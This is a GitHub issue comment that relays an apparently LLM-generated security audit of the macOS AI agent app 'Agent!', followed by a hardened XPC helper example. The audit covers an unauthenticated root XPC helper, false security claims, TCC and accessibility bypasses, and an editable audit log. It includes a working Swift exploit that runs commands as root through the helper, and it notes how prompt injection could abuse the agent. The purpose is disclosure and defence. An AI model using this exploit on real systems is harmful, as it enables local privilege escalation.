hello!
This looks like an interesting project. Based on my existing knowledge about some of the challenges of this type of project, I had gemini perform an initial security review of the code for me:
- it's an LLM generated review. While I think at least some of the commentary is interesting as a basis for further discussion, it is not a formal security review, and anyone else reading this gh issue should DYOR before treating anything suggested in this issue as fact
- my instinct is that the feedback gemini is generating is based on this being an early stage software project, as opposed to you actually attempting to lure people into installing something deliberately designed as a Remote Access Trojan
Either way, I think it's worth you considering the feedback below that gemini produced:
- in the way the repo / project is currently organised, it may trigger alerts for being a RAT
- reading the code references highlighted by gemini, I'd need to look at this in more detail in a better sandboxed environment before reaching any conclusion - I initially thought it would be a quick review and then test, but there are a few things here I need to understand better
looking forward to seeing how you iterate on this project!
gemini review output below. I initially reviewed the 1.0.7 tag, but based on what I saw there, it seemed more useful to review the current main/HEAD:
# Verified Security Audit Report: Agent! Project
**Date:** March 31, 2026
**Commit:** `fc6029c46019acd7fe9b02acee39073d0334e3b8`
## 1. Local Privilege Escalation (Unauthenticated Root Execution)
The project continues to expose a critical Mach service that allows any local process to execute arbitrary commands as root.
* **Vulnerability:** The `AgentHelper` XPC service performs zero caller validation. The `NSXPCListenerDelegate` implementation in `AgentXcode/AgentHelper/main.swift` (L101) accepts all connections without checking the `auditToken` or `processIdentifier`.
* **Mechanism:** Any process on the system can connect to `Agent.app.toddbruss.helper` and call `execute(script:instanceID:withReply:)`, which runs the provided string directly via `/bin/zsh -c` as the root user.
* **Exploitation Example:** An attacker can use the following Swift code in a standalone binary (with no special permissions) to gain root access:
```swift
import Foundation

// HelperToolProtocol is the helper's own XPC protocol; build this against the
// project's declaration (or redeclare it with the same selectors).
let connection = NSXPCConnection(machServiceName: "Agent.app.toddbruss.helper")
connection.remoteObjectInterface = NSXPCInterface(with: HelperToolProtocol.self)
connection.resume()
let helper = connection.remoteObjectProxy as! HelperToolProtocol
helper.execute(script: "whoami > /tmp/pwned", instanceID: "attack") { status, output in
    print("Executed as: \(output)") // Returns "root"
    exit(0)
}
// Keep the process alive until the asynchronous XPC reply arrives.
RunLoop.main.run()
```
## 2. Fabricated Security Features (Documentation vs. Reality)
The project's security documentation makes explicitly false claims about protection mechanisms that do not exist in the code.
* **Fabricated "Write Protection":** `SECURITY.md` (L43) claims that `apple_event_query` blocks destructive operations (`delete`, `close`, `move`, `quit`) by default unless an `allow_writes` parameter is set.
* **Reality:** `AgentXcode/Agent/Views/Services/AppleEventService.swift` (L210) contains **no filtering logic** for these actions. It uses dynamic Objective-C dispatch to execute any method name provided by the AI or user. There is no code that checks for an `allow_writes` parameter.
* **Impact:** Users are misled into believing destructive actions are restricted when they are actually fully enabled.
## 3. TCC Bypass via Arbitrary In-Process Code Execution
The "AgentScript" feature provides a mechanism to run arbitrary code within the main application's process, inheriting all TCC permissions granted by the user.
* **Vulnerability:** `ScriptService` (specifically `ScriptService+Metadata.swift` L281) uses `dlopen` to load dynamic libraries (`.dylib`) compiled from AI-generated Swift code.
* **Impact:** This allows an attacker (via prompt injection or malicious instructions) to execute code that accesses the Screen, Camera, Microphone, and Accessibility APIs without further user interaction, leveraging the "trust" already granted to the `Agent!` app.
## 4. Accessibility Restriction Bypass (Input Simulation)
The input simulation tools effectively ignore the "Security Hardening" settings described in the UI.
* **Vulnerability:** While `performAction` (in `AccessibilityService+Actions.swift`) checks for "restricted roles," the primary input tools `ax_click` and `ax_type_text` use `CGEvent` directly at the window server level.
* **Impact:** `CGEvent` ignores accessibility roles entirely. This means the agent can click on or type into restricted fields (like `AXSecureTextField` / password fields) even if they are marked as "blocked" in the application settings.
* **Proof (Code):**
```swift
// AgentXcode/Agent/Views/Services/AccessibilityService+Actions.swift
// L60: func typeText(_ text: String, at x: CGFloat? = nil, y: CGFloat? = nil) -> String {
// L83: if let event = CGEvent(keyboardEventSource: source, virtualKey: 0x24, keyDown: true) {
// L84: event.post(tap: CGEventTapLocation.cgSessionEventTap)
// ... No role-based or restriction checks are performed before posting the event.
```
## 5. Non-Tamper-Evident Audit Logging
The "Phase 5 Security Hardening" audit log is trivially bypassable.
* **Vulnerability:** `AccessibilityService.swift` logs actions to `~/Documents/AgentScript/logs/accessibility_audit.log` (L481 in `AccessibilityService+Window.swift`).
* **Impact:** Because the agent has native shell and file access, it (or an attacker controlling it) can easily modify or delete this log file to hide malicious activity. There is no integration with the system unified log (`os_log`) for these audit events, and the log location is user-writable.
## Conclusion
The architecture of the `Agent!` project is fundamentally insecure. It provides multiple paths for local privilege escalation and TCC bypass while providing documentation that falsely reassures users about non-existent safeguards.
**Recommendation:** This software should be treated as a high-risk security threat. All components, specifically the `AgentHelper` LaunchDaemon, should be removed immediately.
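For contrast with finding 1 above, here is an added example (not code from the issue, the review, or the Agent! project) of what a privileged helper's `NSXPCListenerDelegate` looks like when it does validate callers: the connection is pinned to a code-signing requirement, and the exported method runs only scripts from a fixed allowlist instead of arbitrary `zsh -c` text. The protocol's argument types, the `com.example.agent` identifiers, the `TEAMID` placeholder, and the `list-launchdaemons` script name are all assumptions for illustration.

```swift
import Foundation

// Assumed shape of the helper protocol; mirrors the call described in the
// review but the argument types are an assumption, not the project's own.
@objc protocol HelperToolProtocol {
    func execute(script: String, instanceID: String,
                 withReply reply: @escaping (Int32, String) -> Void)
}

// Designated requirement the client must satisfy. The bundle identifier and
// TEAMID are placeholders; substitute the signing identity of the real app.
let clientRequirement =
    "anchor apple generic and identifier \"com.example.agent\" " +
    "and certificate leaf[subject.OU] = \"TEAMID\""

final class HelperService: NSObject, HelperToolProtocol {
    // Callers pick a script by name; the helper owns the argv. No shell is
    // involved, so there is no string for the client to inject into.
    private let allowedScripts: [String: [String]] = [
        "list-launchdaemons": ["/bin/ls", "/Library/LaunchDaemons"],   // assumed entry
    ]

    func execute(script: String, instanceID: String,
                 withReply reply: @escaping (Int32, String) -> Void) {
        guard let argv = allowedScripts[script] else {
            reply(EPERM, "refused: '\(script)' is not an allowed script")
            return
        }
        let proc = Process()
        proc.executableURL = URL(fileURLWithPath: argv[0])
        proc.arguments = Array(argv.dropFirst())
        let pipe = Pipe()
        proc.standardOutput = pipe
        do {
            try proc.run()
            proc.waitUntilExit()
            let data = pipe.fileHandleForReading.readDataToEndOfFile()
            reply(proc.terminationStatus, String(decoding: data, as: UTF8.self))
        } catch {
            reply(1, "launch failed: \(error)")
        }
    }
}

final class ListenerDelegate: NSObject, NSXPCListenerDelegate {
    func listener(_ listener: NSXPCListener,
                  shouldAcceptNewConnection newConnection: NSXPCConnection) -> Bool {
        // Refuse every client whose code signature does not satisfy the
        // requirement. On macOS 13+ the framework enforces it per message;
        // on older systems this example simply declines the connection.
        guard #available(macOS 13.0, *) else { return false }
        newConnection.setCodeSigningRequirement(clientRequirement)
        newConnection.exportedInterface = NSXPCInterface(with: HelperToolProtocol.self)
        newConnection.exportedObject = HelperService()
        newConnection.resume()
        return true
    }
}

// Mach service name is an assumption; it must match the LaunchDaemon plist.
let delegate = ListenerDelegate()
let listener = NSXPCListener(machServiceName: "com.example.agent.helper")
listener.delegate = delegate
listener.resume()
RunLoop.main.run()
```

The delegate is held in a global so it is not deallocated while the listener runs. On releases before macOS 13 the equivalent check is done by hand with `SecCodeCopyGuestWithAttributes` on the connection's audit token followed by `SecCodeCheckValidity` against the same requirement string; matching only on `processIdentifier` is not sufficient, since PIDs are reused.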